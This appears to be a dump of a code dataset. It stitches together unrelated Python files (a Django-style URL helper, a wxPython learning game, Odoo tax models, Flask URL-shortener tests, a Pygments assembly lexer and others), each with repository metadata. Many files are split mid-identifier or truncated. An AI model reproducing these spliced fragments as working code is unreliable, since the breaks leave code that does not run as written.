Works on http://, https://, www. links, and also on links ending in one of
the original seven gTLDs (.com, .edu, .gov, .int, .mil, .net, and .org).
Links can have trailing punctuation (periods, commas, close-parens) and
leading punctuation (opening parens) and it'll still do the right thing.
"""
words = word_split_re.split(text)
urls = []
for i, word in enumerate(words):
if '.' in word or ':' in word:
# Deal with punctuation.
lead, middle, trail = '', word, ''
for punctuation in TRAILING_PUNCTUATION:
if middle.endswith(punctuation):
middle = middle[:-len(punctuation)]
trail = punctuation + trail
for opening, closing in WRAPPING_PUNCTUATION:
if middle.startswith(opening):
middle = middle[len(opening):]
lead = lead + opening
# Keep parentheses at the end only if they're balanced.
if (middle.endswith(closing)
and middle.count(closing) == middle.count(opening) + 1):
middle = middle[:-len(closing)]
trail = closing + trail
if simple_url_re.match(middle) or simple_url_2_re.match(middle):
urls.append(smart_urlquote(middle))
return urls
|
nhatbui/LebronCoin
|
lebroncoin/key_loader.py
|
Python
|
mit
| 654
| 0.001529
|
def load_keys(filepath):
"""
Loads the Twitter
|
API keys into a dict.
:param filepath: file path to config file with Twitter API keys.
:return: keys_dict
:raise: IOError
"""
try:
keys_file = open(filepath, 'rb')
keys = {}
for line in keys_
|
file:
key, value = line.split('=')
keys[key.strip()] = value.strip()
except IOError:
message = ('File {} cannot be opened.'
' Check that it exists and is binary.')
print message.format(filepath)
raise
except:
print "Error opening or unpickling file."
raise
return keys
|
bjura/EPlatform
|
EMatch.py
|
Python
|
gpl-3.0
| 18,227
| 0.038094
|
#!/bin/env python2.7
# -*- coding: utf-8 -*-
# This file is part of EPlatform.
#
# EPlatform is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EPlatform is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EPlatform. If not, see <http://www.gnu.org/licenses/>.
import wxversion
wxversion.select('2.8')
import glob, os, time
import time
from random import shuffle
import wx
import wx.lib.buttons as bt
from pymouse import PyMouse
import Tkinter
import numpy as np
import subprocess as sp
import shlex
import pygame
from pygame import mixer
import check
#"nazwij obrazek"
class cwiczenia(wx.Frame):
def __init__(self, parent, id):
wx.Frame.__init__( self , parent , id , 'EMatch')
self.Maximize( True )
self.winWidth, self.winHeight = wx.DisplaySize( )
self.parent=parent
style = self.GetWindowStyle()
self.SetWindowStyle( style | wx.STAY_ON_TOP )
self.initializeParameters()
self.createGui()
self.initializeTimer()
self.Bind( wx.EVT_CLOSE , self.OnExit )
def initializeParameters(self):
self.pathToEPlatform = './'
with open( self.pathToEPlatform + 'parameters', 'r' ) as parametersFile:
for line in parametersFile:
if line[ :line.find('=')-1 ] == 'timeGap':
self.timeGap = int( line[ line.rfind('=')+2:-1 ] )
elif line[ :line.find('=')-1 ] == 'backgroundColour':
self.backgroundColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'textColour':
self.textColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'scanningColour':
self.scanningColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'selectionColour':
self.selectionColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'musicVolume':
pass
elif line[ :line.find('=')-1 ] == 'filmVolume':
pass
elif not line.isspace( ):
print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line
self.timeGap = 1500
self.backgroundColour = 'white'
self.textColour = 'black'
self.scanningColour = '#E7FAFD'
self.selectionColour = '#9EE4EF'
with open( self.pathToEPlatform + 'parametersCW', 'r' ) as parametersFile:
for line in parametersFile:
if line[ :line.find('=')-1 ] == 'textSize':
self.textSize = int( line[ line.rfind('=')+2:-1 ])
elif line[ :line.find('=')-1 ] == 'checkTime':
pass
elif line[ :line.find('=')-1 ] == 'colorGrat':
pass
elif line[ :line.find('=')-1 ] == 'maxPoints':
self.maxPoints = int(line[ line.rfind('=')+2:-1 ])
elif line[ :line.find('=')-1 ] == 'colorNiest':
pass
elif line[ :line.find('=')-1 ] == 'ileLuk':
pass
elif not line.isspace( ):
print 'Niewłaściwie opisane parametry'
print 'Błąd w linii', line
self.textSize=80
sel.maxPoints=2
self.flaga=0
self.PicNr=0
self.result=0
self.mouseCursor = PyMouse( )
self.WordsList=os.listdir(self.pathToEPlatform+'multimedia/pictures')
shuffle(self.WordsList)
self.poczatek=True
self.numberOfPresses = 1
self.czyBack=False
mixer.init()
self.numberOfExtraWords= 4
#self.ktorySizer='wyrazy'
def initializeTimer(self):
id1=wx.NewId()
wx.RegisterId(id1)
self.stoper = wx.Timer(self,id1)
self.Bind( wx.EVT_TIMER, self.timerUpdate, self.stoper,id1 )
#self.id2=wx.NewId()
#wx.RegisterId(self.id2)
#self.stoper2 = wx.Timer( self ,self.id2)
self.id3=wx.NewId()
wx.RegisterId(self.id3)
self.stoper3 = wx.Timer( self ,self.id3)
self.id4=wx.NewId()
wx.RegisterId(self.id4)
self.stoper4=wx.Timer(self,self.id4)
self.Bind(wx.EVT_TIMER, self.pomocniczyStoper, self.stoper4,self.id4 )
self.stoper.Start( self.timeGap )
def timerUpdate(self,event):
self.mouseCursor.move( self.winWidth - 12, self.winHeight - 12 )
self.numberOfPresses = 0
'''for i in range(5):
item = self.subSizer.GetChildren()
b=item[i].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()
for i in range(self.numberOfExtraWords+1):
item = self.wordSizer.GetChildren()
b=item[i].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()'''
if self.flaga<= self.numberOfExtraWords+1 and self.flaga>0:
item = self.wordSizer.GetChildren()
b = item[self.flaga-1].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()
else:
if self.flaga==0:
item = self.subSizer.GetChildren()
b=item[len(item)-1].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()
else:
item = self.subSizer.GetChildren()
b=item[self.flaga-self.numberOfExtraWords -2].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()
if self.poczatek:
time.sleep(1)
self.stoper.Stop()
mixer.music.load(self.pat
|
hToEPlatform+'multimedia/voices/'+str(self.word)+'.ogg')
|
mixer.music.play()
time.sleep(2)
self.stoper.Start(self.timeGap)
self.poczatek=False
if self.flaga >= self.numberOfExtraWords+1:
item = self.subSizer.GetChildren()
b=item[self.flaga-self.numberOfExtraWords -1].GetWindow()
b.SetBackgroundColour( self.scanningColour )
b.SetFocus()
else:
item = self.wordSizer.GetChildren()
b = item[self.flaga].GetWindow()
b.SetBackgroundColour( self.scanningColour )
b.SetFocus()
if self.flaga== 4 +self.numberOfExtraWords+1:
self.flaga=0
else:
self.flaga+=1
def createGui(self):
if self.PicNr ==len(self.WordsList):
self.PicNr=0
self.picture=self.WordsList[self.PicNr]
self.PicNr+=1
self.path=self.pathToEPlatform+'multimedia/pictures/'
im=wx.ImageFromStream( open(self.path+self.picture, "rb"))
x=im.GetWidth()
y=im.GetHeight()
if x >y:
im=im.Scale(600,500)
elif x==y:
im=im.Scale(600,600)
else:
im=im.Scale(500,600)
picture=wx.BitmapFromImage(im)
self.word=self.picture[:self.picture.index('.')]
self.extraWords=[] #wybiera dodatkowe slowa
while len(self.extraWords)<self.numberOfExtraWords:
slowo=self.WordsList[np.random.randint(0,len(self.Wor
|
googleapis/python-speech
|
samples/snippets/transcribe_enhanced_model.py
|
Python
|
apache-2.0
| 2,170
| 0.000461
|
#!/usr/bin/env python
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language gov
|
erning permissions and
# limitations under the License.
"""Google Cloud Speech API sample that demonstrates enhanced models
and recognition me
|
tadata.
Example usage:
python transcribe_enhanced_model.py resources/commercial_mono.wav
"""
import argparse
def transcribe_file_with_enhanced_model(path):
"""Transcribe the given audio file using an enhanced model."""
# [START speech_transcribe_enhanced_model]
import io
from google.cloud import speech
client = speech.SpeechClient()
# path = 'resources/commercial_mono.wav'
with io.open(path, "rb") as audio_file:
content = audio_file.read()
audio = speech.RecognitionAudio(content=content)
config = speech.RecognitionConfig(
encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=8000,
language_code="en-US",
use_enhanced=True,
# A model must be specified to use enhanced model.
model="phone_call",
)
response = client.recognize(config=config, audio=audio)
for i, result in enumerate(response.results):
alternative = result.alternatives[0]
print("-" * 20)
print("First alternative of result {}".format(i))
print("Transcript: {}".format(alternative.transcript))
# [END speech_transcribe_enhanced_model]
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("path", help="File to stream to the API")
args = parser.parse_args()
transcribe_file_with_enhanced_model(args.path)
|
t3dev/odoo
|
addons/account_tax_python/models/account_tax.py
|
Python
|
gpl-3.0
| 4,229
| 0.010877
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, fields, api
from odoo.tools.safe_eval import safe_eval
class AccountTaxPython(models.Model):
_inherit = "account.tax"
amount_type = fields.Selection(selection_add=[('code', 'Python Code')])
python_compute = fields.Text(string='Python Code', default="result = price_unit * 0.10",
help="Compute the amount of the tax by setting the variable 'result'.\n\n"
":param base_amount: float, actual amount on which the tax is applied\n"
":param price_unit: float\n"
":param quantity: float\n"
":param company: res.company recordset singleton\n"
":param product: product.product recordset singleton or None\n"
":param partner: res.partner recordset singleton or None")
python_applicable = fields.Text(string='Applicable Code', default="result = True",
help="Determine if the tax will be applied by setting the variable 'result' to True or False.\n\n"
":param price_unit:
|
float\n"
":param quantity: float\n"
":param company: res.company recordset singleton\n"
":param product: product.product recordset singleton or None\n"
":param partner: res.partner recordset singleton or None")
def _compute_amount(self, base_amount, price_unit, quantity=1.0, product=None, partner=None):
self.ensure_one()
if self.amount_type == 'code':
company = self.env.user.company_id
localdict = {'base_amount'
|
: base_amount, 'price_unit':price_unit, 'quantity': quantity, 'product':product, 'partner':partner, 'company': company}
safe_eval(self.python_compute, localdict, mode="exec", nocopy=True)
return localdict['result']
return super(AccountTaxPython, self)._compute_amount(base_amount, price_unit, quantity, product, partner)
@api.multi
def compute_all(self, price_unit, currency=None, quantity=1.0, product=None, partner=None):
taxes = self.filtered(lambda r: r.amount_type != 'code')
company = self.env.user.company_id
for tax in self.filtered(lambda r: r.amount_type == 'code'):
localdict = self._context.get('tax_computation_context', {})
localdict.update({'price_unit': price_unit, 'quantity': quantity, 'product': product, 'partner': partner, 'company': company})
safe_eval(tax.python_applicable, localdict, mode="exec", nocopy=True)
if localdict.get('result', False):
taxes += tax
return super(AccountTaxPython, taxes).compute_all(price_unit, currency, quantity, product, partner)
class AccountTaxTemplatePython(models.Model):
_inherit = 'account.tax.template'
amount_type = fields.Selection(selection_add=[('code', 'Python Code')])
python_compute = fields.Text(string='Python Code', default="result = price_unit * 0.10",
help="Compute the amount of the tax by setting the variable 'result'.\n\n"
":param base_amount: float, actual amount on which the tax is applied\n"
":param price_unit: float\n"
":param quantity: float\n"
":param product: product.product recordset singleton or None\n"
":param partner: res.partner recordset singleton or None")
python_applicable = fields.Text(string='Applicable Code', default="result = True",
help="Determine if the tax will be applied by setting the variable 'result' to True or False.\n\n"
":param price_unit: float\n"
":param quantity: float\n"
":param product: product.product recordset singleton or None\n"
":param partner: res.partner recordset singleton or None")
def _get_tax_vals(self, company, tax_template_to_tax):
""" This method generates a dictionnary of all the values for the tax that will be created.
"""
self.ensure_one()
res = super(AccountTaxTemplatePython, self)._get_tax_vals(company, tax_template_to_tax)
res['python_compute'] = self.python_compute
res['python_applicable'] = self.python_applicable
return res
|
flavour/tldrmp
|
private/templates/IFRC/menus.py
|
Python
|
mit
| 31,780
| 0.005129
|
# -*- coding: utf-8 -*-
from gluon import current
from s3 import *
from s3layouts import *
try:
from .layouts import *
except ImportError:
pass
import s3menus as default
red_cross_filter = {"organisation.organisation_type_id$name" : "Red Cross / Red Crescent"}
# =============================================================================
class S3MainMenu(default.S3MainMenu):
""" Custom Application Main Menu """
# -------------------------------------------------------------------------
@classmethod
def menu(cls):
""" Compose Menu """
# Modules menus
main_menu = MM()(
cls.menu_modules(),
)
# Additional menus
current.menu.personal = cls.menu_personal()
current.menu.dashboard = cls.menu_dashboard()
return main_menu
# -------------------------------------------------------------------------
@classmethod
def menu_modules(cls):
""" Custom Modules Menu """
T = current.T
return [
homepage("gis")(
),
homepage("hrm", "org", name=T("Staff"),
vars=dict(group="staff"))(
MM("Staff", c="hrm", f="staff"),
MM("Teams", c="hrm", f="group"),
MM("National Societies", c="org", f="organisation",
vars = red_cross_filter),
MM("Offices", c="org", f="office"),
MM("Job Titles", c="hrm", f="job_title"),
#MM("Skill List", c="hrm", f="skill"),
MM("Training Events", c="hrm", f="training_event"),
MM("Training Courses", c="hrm", f="course"),
MM("Certificate List", c="hrm", f="certificate"),
),
homepage("vol", name=T("Volunteers"))(
MM("Volunteers", c="vol", f="volunteer"),
MM("Teams", c="vol", f="group"),
MM("Volunteer Roles", c="vol", f="job_title"),
MM("Programs", c="vol", f="programme"),
#MM("Skill List", c="vol", f="skill"),
MM("Training Events", c="vol", f="training_event"),
MM("Training Courses", c="vol", f="course"),
MM("Certificate List", c="vol", f="certificate"),
),
homepage("member")(
MM("Members", c="member", f="membership"),
),
homepage("inv", "supply", "req")(
MM("Warehouses", c="inv", f="warehouse"),
|
MM("Received Shipments", c="inv", f="recv"),
MM("Sent Shipments", c="inv", f="send"),
MM("Items", c="supply", f="item"),
MM("Item Catalogs", c="s
|
upply", f="catalog"),
MM("Item Categories", c="supply", f="item_category"),
M("Requests", c="req", f="req")(),
#M("Commitments", f="commit")(),
),
homepage("asset")(
MM("Assets", c="asset", f="asset"),
MM("Items", c="asset", f="item"),
),
homepage("survey")(
MM("Assessment Templates", c="survey", f="template"),
MM("Disaster Assessments", c="survey", f="series"),
),
homepage("project")(
MM("Projects", c="project", f="project"),
MM("Communities", c="project", f="location"),
),
homepage("vulnerability")(
MM("Map", c="vulnerability", f="index"),
),
homepage("event", "irs")(
MM("Events", c="event", f="event"),
MM("Incident Reports", c="irs", f="ireport"),
),
homepage("deploy", name="RDRT")(
MM("Missions", c="deploy", f="mission", m="summary"),
MM("Members", c="deploy", f="human_resource", m="summary"),
),
]
# -------------------------------------------------------------------------
@classmethod
def menu_dashboard(cls):
""" Dashboard Menu (at bottom of page) """
DB = S3DashBoardMenuLayout
request = current.request
if request.controller == "vol":
dashboard = DB()(
DB("VOLUNTEERS",
c="vol",
image = "graphic_staff_wide.png",
title = "Volunteers")(
DB("Manage Volunteer Data", f="volunteer"),
DB("Manage Teams Data", f="group"),
),
DB("CATALOGS",
c="hrm",
image="graphic_catalogue.png",
title="Catalogs")(
DB("Certificates", f="certificate"),
DB("Training Courses", f="course"),
#DB("Skills", f="skill"),
DB("Job Titles", f="job_title")
))
elif request.controller in ("hrm", "org"):
dashboard = DB()(
DB("STAFF",
c="hrm",
image = "graphic_staff_wide.png",
title = "Staff")(
DB("Manage Staff Data", f="staff"),
DB("Manage Teams Data", f="group"),
),
DB("OFFICES",
c="org",
image = "graphic_office.png",
title = "Offices")(
DB("Manage Offices Data", f="office"),
DB("Manage National Society Data", f="organisation",
vars=red_cross_filter
),
),
DB("CATALOGS",
c="hrm",
image="graphic_catalogue.png",
title="Catalogs")(
DB("Certificates", f="certificate"),
DB("Training Courses", f="course"),
#DB("Skills", f="skill"),
DB("Job Titles", f="job_title")
))
elif request.controller == "default" and request.function == "index":
dashboard = DB(_id="dashboard")(
DB("Staff", c="hrm", f="staff", m="search",
image = "graphic_staff.png",
title = "Staff",
text = "Add new and manage existing staff."),
DB("Volunteers", c="vol", f="volunteer", m="search",
image = "graphic_volunteers.png",
title = "Volunteers",
text = "Add new and manage existing volunteers."),
DB("Members", c="member", f="index",
image = "graphic_members.png",
title = "Members",
text = "Add new and manage existing members."),
DB("Warehouses", c="inv", f="index",
image = "graphic_warehouse.png",
title = "Warehouses",
text = "Stocks and relief items."),
DB("Assets", c="asset", f="index",
image = "graphic_assets.png",
title = "Assests",
text = "Manage office inventories and assets."),
DB("Assessments", c="survey", f="index",
image = "graphic_assessments.png",
title = "Assessments",
text = "Design, deploy & analyze surveys."),
DB("Projects", c="project", f="index",
image = "graphic_tools.png",
title = "Projects",
text = "Tracking and analysis of Projects and Activities.")
)
else:
dashboard = None
return dashboard
# -------------------------------------------------------------------------
@classmethod
def menu_personal(cls):
""" Custom Personal Menu """
auth = current.auth
s3 = current.response.s3
settings = current.deployment_settings
# Language selector
menu_lang = ML("Language", right=True)
for language in s3.l10n_languages.items():
code, name = language
|
loogica/urlsh
|
test_views.py
|
Python
|
mit
| 2,651
| 0.002641
|
import os
import shutil
|
import unittest
from flask import json
class NewsView(unittest.TestCase):
def setUp(self):
import web
reload(web)
self.app = web.app.test_client
|
()
def tearDown(self):
try:
shutil.rmtree('urlshortner')
except:
pass
def test_get_home(self):
response = self.app.get('/', follow_redirects=True)
assert 200 == response.status_code
assert 'Loogi.ca' in response.data
assert 'input' in response.data
def test_urls(self):
response = self.app.get('/urls/')
assert 200 == response.status_code
assert {} == json.loads(response.data)
def test_get_ranking(self):
response = self.app.get('/ranking')
assert 200 == response.status_code
assert 'Ranking' in response.data
def test_add_url(self):
data = json.dumps(dict(url='http://loogi.ca'))
response = self.app.post('/add_url/', data=data,
content_type="application/json")
assert 200 == response.status_code
assert 'http://loogi.ca' == json.loads(response.data)['url']
assert 'shortned' in json.loads(response.data)
def test_add_url_custom_shortned(self):
data = json.dumps(dict(url='http://loogi.ca', shortned='loogica'))
response = self.app.post('/add_url/', data=data,
content_type="application/json")
assert 200 == response.status_code
assert 'http://loogi.ca' == json.loads(response.data)['url']
assert 'shortned' in json.loads(response.data)
assert 'loogica' == json.loads(response.data)['shortned']
def test_add_invalid_url(self):
data = json.dumps(dict(url='loogica'))
response = self.app.post('/add_url/', data=data,
content_type="application/json")
assert 200 == response.status_code
assert 'error' in json.loads(response.data)
def test_resolved(self):
data = json.dumps(dict(url='http://loogi.ca'))
response = self.app.post('/add_url/', data=data,
content_type="application/json")
url_short_id = json.loads(response.data)['shortned']
response = self.app.get('/%s' % url_short_id)
assert 302 == response.status_code
assert 'Location' in str(response.headers)
assert 'http://loogi.ca' in str(response.headers)
def test_bad_resolved(self):
response = self.app.get('/invalid')
assert 404 == response.status_code
|
jaredlunde/cargo-orm
|
unit_tests/fields/Cidr.py
|
Python
|
mit
| 2,247
| 0.000445
|
#!/usr/bin/python3 -S
# -*- coding: utf-8 -*-
import netaddr
from cargo.fields import Cidr
from unit_tests.fields.Field import TestField
from unit_tests import configure
class TestCidr(configure.NetTestCase, TestField):
@property
def base(self):
return self.orm.cidr
def test___call__(self):
base = Cidr()
self.assertEqual(base.value, base.empty)
base('127.0.0.1/32')
self.assertIsInstance(base.value, netaddr.IPNetwork)
def test_insert(self):
self.base('127.0.0.1/32')
val = getattr(self.orm.new().insert(self.base), self.base.field_name)
self.assertEqual(str(val.value), '127.0.0.1/32')
def test_select(self):
self.base('127.0.0.1/32')
self.orm.insert(self.base)
val = self.orm.new().desc(self.orm.uid).get()
self.assertEqual(str(getattr(val, self.base.field_name).value),
'127.0.0.1/32')
def test_array_insert(self):
arr = ['127.0.0.1/32', '127.0.0.2/32', '127.0.0.3/32']
self.base_array(arr)
val = getattr(self.orm.new().insert(self.base_array),
self.base_array.field_name)
self.assertListEqual(list(map(str,
|
val.value)), arr)
def test_array_select(self):
arr = ['127.0.0.1/32', '127.0.0.2/32', '127.0.0.3/32']
self.base_array(arr)
val = getattr(self.orm.new().insert(self.base_array),
self.base_array.field_name)
val_b = getattr(self.orm.new().desc(self.orm.uid).get(),
|
self.base_array.field_name)
self.assertListEqual(list(map(str, val.value)), list(map(str, val_b.value)))
def test_type_name(self):
self.assertEqual(self.base.type_name, 'cidr')
self.assertEqual(self.base_array.type_name, 'cidr[]')
class TestEncCidr(TestCidr):
@property
def base(self):
return self.orm.enc_cidr
def test_init(self, *args, **kwargs):
pass
def test_type_name(self):
self.assertEqual(self.base.type_name, 'text')
self.assertEqual(self.base_array.type_name, 'text[]')
if __name__ == '__main__':
# Unit test
configure.run_tests(TestCidr, TestEncCidr, verbosity=2, failfast=True)
|
jmacmahon/invenio
|
modules/websearch/lib/websearch_external_collections_templates.py
|
Python
|
gpl-2.0
| 7,238
| 0.005388
|
# -*- coding: utf-8 -*-
# This file is part of Invenio.
# Copyright (C) 2006, 2007, 2008, 2010, 2011 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Template for the external collections search."""
__revision__ = "$Id$"
import cgi
from invenio.config import CFG_SITE_LANG
from invenio.messages import gettext_set_language
from invenio.urlutils import create_html_link
class Template:
"""Template class for the external collection search. To be loaded with template.load()"""
def __init__(self):
pass
def external_collection_seealso_box(self, lang, links,
prolog_start='<table class="externalcollectionsbox"><tr><th colspan="2" class="externalcollectionsboxheader">',
prolog_end='</th></tr><tr><td class="externalcollectionsboxbody">',
column_separator='</td><td class="externalcollectionsboxbody">',
link_separator= '<br />', epilog='</td></tr></table>'):
"""Creates the box that proposes links to other useful search engines like Google.
lang: string - The language to display in
links: list of string - List of links to display in the box
prolog_start, prolog_end, column_separator, link_separator, epilog': strings -
default HTML code for the specified position in the box"""
_ = gettext_set_language(lang)
out = ""
if links:
out += '<a name="externalcollectionsbox"></a>'
out += prolog_start
out += _("Haven't found what you were looking for? Try your search on other servers:")
out += prolog_end
nb_out_links_in_one_column = len(links)/2 + len(links) % 2
out += link_separator.join(links[:nb_out_links_in_one_column])
out += column_separator
out += link_separator.join(links[nb_out_links_in_one_column:])
out += epilog
return out
def external_collection_overview(self, lang=CFG_SITE_LANG, engine_list=()):
"""Prints results overview box with links to particular collections below.
lang: The language to display
engine_list: The external engines to be used"""
if len(engine_list) < 1:
return ""
_ = gettext_set_language(lang)
out = """
<table class="externalcollectionsresultsbox">
<thead>
<tr>
<th class="externalcollectionsresultsboxheader"><strong>%s</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td class="externalcollectionsresultsboxbody"> """ % _("External collections results overview:")
for engine in engine_list:
internal_name = get_link_name(engine.name)
name = _(engine.name)
out += """<strong><a href="#%(internal_name)s">%(name)s</a></strong><br />""" % locals()
out += """
</td>
</tr>
</tbody>
</table>
"""
return out
def print_info_line(req,
html_external_engine_name_box,
html_external_engine_nb_results_box,
html_external_engine_nb_seconds_box):
"""Print on req an information line about results of an external collection search."""
req.write('<table class="externalcollectionsresultsbox"><tr>')
req.write('<td class="externalcollectionsresultsboxheader">')
req.write('<big><strong>' + \
html_exte
|
rnal_engine_name_box + \
'</strong></big>')
req.write(' ')
req.write(html_external_engine_nb_results_box)
req.write('</td><td class="externalcollectionsresultsboxheader" width="20%" align="right">')
req.write('<small>' + \
html_external_engine_nb_seconds_box + \
'</small>')
req.write('</td></tr></table><br />')
def print_timeout(req, lang, engine, name, url):
"""Prin
|
t info line for timeout."""
_ = gettext_set_language(lang)
req.write('<a name="%s"></a>' % get_link_name(engine.name))
print_info_line(req,
create_html_link(url, {}, name, {}, False, False),
'',
_('Search timed out.'))
message = _("The external search engine has not responded in time. You can check its results here:")
req.write(message + ' ' + create_html_link(url, {}, name, {}, False, False) + '<br />')
def get_link_name(name):
"""Return a hash string for the string name."""
return hex(abs(name.__hash__()))
def print_results(req, lang, pagegetter, infos, current_time, print_search_info=True, print_body=True):
"""Print results of a given search engine.
current_time is actually the duration, expressed in seconds of execution of request.
"""
_ = gettext_set_language(lang)
url = infos[0]
engine = infos[1]
internal_name = get_link_name(engine.name)
name = _(engine.name)
base_url = engine.base_url
results = engine.parser.parse_and_get_results(pagegetter.data)
html_tit = make_url(name, base_url)
if print_search_info:
num = format_number(engine.parser.parse_num_results())
if num:
if num == '0':
html_num = _('No results found.')
html_sec = ''
else:
html_num = '<strong>' + \
make_url(_('%s results found') % num, url) + \
'</strong>'
html_sec = '(' + _('%s seconds') % ('%2.2f' % current_time) + ')'
else:
html_num = _('No results found.')
html_sec = ''
req.write('<a name="%(internal_name)s"></a>' % locals())
print_info_line(req,
html_tit,
html_num,
html_sec)
if print_body:
for result in results:
req.write(result.html + '<br />')
if not results:
req.write(_('No results found.') + '<br />')
def make_url(name, url):
if url:
return '<a href="' + cgi.escape(url) + '">' + name + '</a>'
else:
return name
def format_number(num, separator=','):
"""Format a number by separating thousands with a separator (by default a comma)
>>> format_number(10)
'10'
>>> format_number(10000)
'10,000'
>>> format_number(' 000213212424249 ', '.')
'213.212.424.249'
"""
result = ""
try:
num = int(num)
except:
return None
if num == 0:
return '0'
while num > 0:
part = num % 1000
num = num / 1000
result = "%03d" % part + separator + result
return result.strip('0').strip(separator)
|
sysbot/pastedown
|
vendor/pygments/pygments/lexers/asm.py
|
Python
|
mit
| 12,130
| 0.001319
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.asm
~~~~~~~~~~~~~~~~~~~
Lexers for assembly languages.
:copyright: Copyright 2006-2012 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups, using, DelegatingLexer
from pygments.lexers.compiled import DLexer, CppLexer, CLexer
from pygments.token import Text, Name, Number, String, Comment, Punctuation, \
Other, Keyword, Operator
__all__ = ['GasLexer', 'ObjdumpLexer','DObjdumpLexer', 'CppObjdumpLexer',
'CObjdumpLexer', 'LlvmLexer', 'NasmLexer']
class GasLexer(RegexLexer):
"""
For Gas (AT&T) assembly code.
"""
name = 'GAS'
aliases = ['gas']
filenames = ['*.s', '*.S']
mimetypes = ['text/x-gas']
#: optional Comment or Whitespace
string = r'"(\\"|[^"])*"'
char = r'[a-zA-Z$._0-9@-]'
identifier = r'(?:[a-zA-Z$_]' + char + '*|\.' + char + '+)'
number = r'(?:0[xX][a-zA-Z0-9]+|\d+)'
tokens = {
'root': [
include('whitespace'),
(identifier + ':', Name.Label),
(r'\.' + identifier, Name.Attribute, 'directive-args'),
(r'lock|rep(n?z)?|data\d+', Name.Attribute),
(identifier, Name.Function, 'instruction-args'),
(r'[\r\n]+', Text)
],
'directive-args': [
(identifier, Name.Constant),
(string, String),
('@' + identifier, Name.Attribute),
(number, Number.Integer),
(r'[\r\n]+', Text, '#pop'),
(r'#.*?$', Comment, '#pop'),
include('punctuation'),
include('whitespace')
],
'instruction-args': [
# For objdump-disassembled code, shouldn't occur in
# actual assembler input
('([a-z0-9]+)( )(<)('+identifier+')(>)',
bygroups(Number.Hex, Text, Punctuation, Name.Constant,
Punctuation)),
('([a-z0-9]+)( )(<)('+identifier+')([-+])('+number+')(>)',
bygroups(Number.Hex, Text, Punctuation, Name.Constant,
Punctuation, Number.Integer, Punctuation)),
# Address constants
(identifier, Name.Constant),
(number, Number.Integer),
# Registers
('%' + identifier, Name.Variable),
# Numeric constants
('$'+number, Number.Integer),
(r"$'(.|\\')'", String.Char),
(r'[\r\n]+', Text, '#pop'),
(r'#.*?$', Comment, '#pop'),
include('punctuation'),
include('whitespace')
],
'whitespace': [
(r'\n', Text),
(r'\s+', Text),
(r'#.*?\n', Comment)
],
'punctuation': [
(r'[-*,.():]+', Punctuation)
]
}
def analyse_text(text):
if re.match(r'^\.(text|data|section)', text, re.M):
return True
elif re.match(r'^\.\w+', text, re.M):
return 0.1
class ObjdumpLexer(RegexLexer):
"""
For the output of 'objdump -dr'
"""
name = 'objdump'
aliases = ['objdump']
filenames = ['*.objdump']
mimetypes = ['text/x-objdump']
hex = r'[0-9A-Za-z]'
tokens = {
'root': [
# File name & format:
('(.*?)(:)( +file format )(.*?)$',
bygroups(Name.Label, Punctuation, Text, String)),
# Section header
('(Disassembly of section )(.*?)(:)$',
bygroups(Text, Name.Label, Punctuation)),
# Function labels
# (With offset)
('('+hex+'+)( )(<)(.*?)([-+])(0[xX][A-Za-z0-9]+)(>:)$',
bygroups(Number.Hex, Text, Punctuation, Name.Function,
Punctuation, Number.Hex, Punctuation)),
# (Without offset)
('('+hex+'+)( )(<)(.*?)(>:)$',
bygroups(Number.Hex, Text, Punctuation, Name.Function,
Punctuation)),
# Code line with disassembled instructions
('( *)('+hex+r'+:)(\t)((?:'+hex+hex+' )+)( *\t)([a-zA-Z].*?)$',
bygroups(Text, Name.Label, Text, Number.Hex, Text,
using(GasLexer))),
# Code line with ascii
('( *)('+hex+r'+:)(\t)((?:'+hex+hex+' )+)( *)(.*?)$',
bygroups(Text, Name.Label, Text, Number.Hex, Text, String)),
# Continued code line, only raw opcodes without disassembled
# instruction
('( *)('+hex+r'+:)(\t)((?:'+hex+hex+' )+)$',
bygroups(Text, Name.Label, Text, Number.Hex)),
# Skipped a few bytes
(r'\t\.\.\.$', Text),
# Relocation line
# (With offset)
